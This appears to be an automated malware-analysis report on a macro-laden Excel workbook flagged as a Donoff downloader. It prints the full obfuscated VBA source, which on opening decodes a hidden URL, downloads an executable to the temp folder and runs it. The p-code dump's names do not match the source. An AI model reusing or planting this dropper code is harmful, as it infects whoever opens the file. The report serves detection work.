Verdict: MALICIOUS
Risk Score: 296

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Donoff-6700491-0. Critical heuristics indicate VBA macros that use the URLDownloadToFile and ShellExecute APIs. A Workbook_Open event handler is also present, so the macro code runs automatically when the workbook is opened. The primary function of the VBA script appears to be downloading and executing a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Donoff-6700491-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
- Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]. Matched line in script:
  Private Declare PtrSafe Function otqBETpqzJEixQkDynScdbgQJQvIHX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ceVvKCnUWrTYnxRfSEgCBdKcOSs As Long, ByVal SrlDAXtRKGRjxSGQojLNuO As String, ByVal TcRxGGFKhovZnmCFIAYohQzBVy As String, ByVal DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz As Long, ByVal deKRksiNIJHMyELcDCSILCcEkiPEYOFT As Long) As Long
- Workbook_Open macro [low, OLE_VBA_WBOPEN]. Matched line in script:
  Private Sub Workbook_Open()
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched line in script:
  fVkuddPCeAMbIZLPpebUnkHdB = Environ$("tmp") & "\" & PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp
- Heap-spray pattern detected [high, SC_HEAP_SPRAY]: Repeated 0x06 bytes found. Attempted x86 opcode disassembly: every offset from 0000CE7A through 0000CED9 (96 consecutive bytes) decodes as `06 push es`.
- Reference to ShellExecute API [high, SC_STR_SHELLEXEC]
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9032 bytes |

SHA-256: 9fec7e18202f1e7593adae843859f2b7ed284742dd3fc456244eb53c38f5adde

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub szz()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Macro Name: HDPShCENXRvLeyRLBhqqpufXfJVVmpskI
Private Declare PtrSafe Function WGRXTfwxSTeBiLcHOipfKFGEJvovZAmBFIzYBhQMBVLC Lib "shell32.dll" Alias "ShellExecuteA" (ByVal eMMzzbjwXsWvMYNKEWTqZlrnyP As Long, ByVal QmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgU As String, ByVal pfVkuddPCeAMbIZLPpebUnkHdBHDPS As String, ByVal hCENXRvLeyRLBhqqpufXfJVVmpskIX As String, ByVal QAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQ As String, ByVal ojLNuOTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSg As Long) As Long
Private Declare PtrSafe Function otqBETpqzJEixQkDynScdbgQJQvIHX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ceVvKCnUWrTYnxRfSEgCBdKcOSs As Long, ByVal SrlDAXtRKGRjxSGQojLNuO As String, ByVal TcRxGGFKhovZnmCFIAYohQzBVy As String, ByVal DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz As Long, ByVal deKRksiNIJHMyELcDCSILCcEkiPEYOFT As Long) As Long
Private Function LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB)
Dim LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF, KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH, txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB = StrReverse(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB)
For KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH = 1 To Len(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB)
LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF = Mid(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB, KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH, 1)
txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP = txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP & Chr(Asc(LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF) - 1)
Next
LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn = txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
End Function
Private Sub SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ()
Dim bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI As Integer
bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI = 504
Dim qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX As Integer
qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX = 100
If bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI + qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX = 604 Then
HDPShCENXRvLeyRLBhqqpufXfJVVmpskI
End If
End Sub
Private Sub HDPShCENXRvLeyRLBhqqpufXfJVVmpskI()
Dim cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny As String, PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp As String, fVkuddPCeAMbIZLPpebUnkHdB As String, XQAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQojLNu As String, OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH As String, BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI As String
PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp = LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn("fyf/ojxutpidq")
fVkuddPCeAMbIZLPpebUnkHdB = Environ$("tmp") & "\" & PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp
cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny = LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn("fyf/tzt{vt0nfutzt.qx0vb/npd/fdbqtfmzutzujdejn00;quui")
otqBETpqzJEixQkDynScdbgQJQvIHX 0, cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny, fVkuddPCeAMbIZLPpebUnkHdB, 0, 0
WGRXTfwxSTeBiLcHOipfKFGEJvovZAmBFIzYBhQMBVLC 0, "open", fVkuddPCeAMbIZLPpebUnkHdB, "", vbNullString, vbNormalFocus
End Sub
Private Sub Workbook_Open()
Range("A1").Value = ""
SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/4e3700cb36314bbe8867065296cac3e2.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' FuncDefn (Sub Sheet3())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 4689 bytes
' Line #0:
' QuoteRem 0x0000 0x002D "Macro Name: HDPShCENXRvLeyRLBhqqpufXfJVVmpskI"
' Line #1:
' FuncDefn (Private Declare PtrSafe Function hCENXRvLeyRLBhqqpufXfJVVmpskIX Lib "TcRxGGFKhovZnmCFIAYohQzBVy" (ByVal QAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQ As Long, ByVal ojLNuOTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSg As String, ByVal shell32.dll As String, ByVal otqBETpqzJEixQkDynScdbgQJQvIHX As String, ByVal ceVvKCnUWrTYnxRfSEgCBdKcOSs As String, ByVal SrlDAXtRKGRjxSGQojLNuO As Long) As Long)
' Line #2:
' FuncDefn (Private Declare PtrSafe Function DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz Lib "LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF" (ByVal deKRksiNIJHMyELcDCSILCcEkiPEYOFT As Long, ByVal urlmon As String, ByVal LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn As String, ByVal PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB As Long, ByVal Workbook As Long) As Long)
' Line #3:
' FuncDefn (Private Function KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH(txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP, id_FFFE As Variant))
' Line #4:
' Dim
' VarDefn Chr
' VarDefn Asc
' VarDefn SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' Line #5:
' Ld txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' ArgsLd bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI 0x0001
' St txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' Line #6:
' StartForVariable
' Ld Asc
' EndForVariable
' LitDI2 0x0001
' Ld txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' FnLen
' For
' Line #7:
' Ld txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' Ld Asc
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St Chr
' Line #8:
' Ld SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' Ld Chr
' ArgsLd HDPShCENXRvLeyRLBhqqpufXfJVVmpskI 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX 0x0001
' Concat
' St SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' Line #9:
' StartForVariable
' Next
' Line #10:
' Ld SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' St KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH
' Line #11:
' EndFunc
' Line #12:
' FuncDefn (Private Sub cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny())
' Line #13:
' Dim
' VarDefn PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp (As Integer)
' Line #14:
' LitDI2 0x01F8
' St PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp
' Line #15:
' Dim
' VarDefn fVkuddPCeAMbIZLPpebUnkHdB (As Integer)
' Line #16:
' LitDI2 0x0064
' St fVkuddPCeAMbIZLPpebUnkHdB
' Line #17:
' Ld PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp
' Ld fVkuddPCeAMbIZLPpebUnkHdB
' Add
' LitDI2 0x025C
' Eq
' IfBlock
' Line #18:
' ArgsCall XQAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQojLNu 0x0000
' Line #19:
' EndIfBlock
' Line #20:
' EndSub
' Line #21:
' FuncDefn (Private Sub XQAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQojLNu())
' Line #22:
' Dim
' VarDefn OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH (As String)
' VarDefn BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI (As String)
' VarDefn Environ (As String)
' VarDefn vbNullString (As String)
' VarDefn vbNormalFocus (As String)
' VarDefn Workbook_Open (As String)
' Line #23:
' LitStr 0x000D "fyf/ojxutpidq"
' ArgsLd KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH 0x0001
' St BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI
' Line #24:
' LitStr 0x0003 "tmp"
' ArgsLd Range$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI
' Concat
' St Environ
' Line #25:
' LitStr 0x0034 "fyf/tzt{vt0nfutzt.qx0vb/npd/fdbqtfmzutzujdejn00;quui"
' ArgsLd KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH 0x0001
' St OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH
' Line #26:
' LitDI2 0x0000
' Ld OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH
' Ld Environ
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz 0x0005
' Line #27:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Environ
' LitStr 0x0000 ""
' Ld Value
' Ld Worksheet
' ArgsCall hCENXRvLeyRLBhqqpufXfJVVmpskIX 0x0006
' Line #28:
' EndSub
' Line #29:
' FuncDefn (Private Sub id_0278())
' Line #30:
' LitStr 0x0000 ""
' LitStr 0x0002 "A1"
' ArgsLd id_027A 0x0001
' MemSt id_027C
' Line #31:
' ArgsCall cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny 0x0000
' Line #32:
' EndSub
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes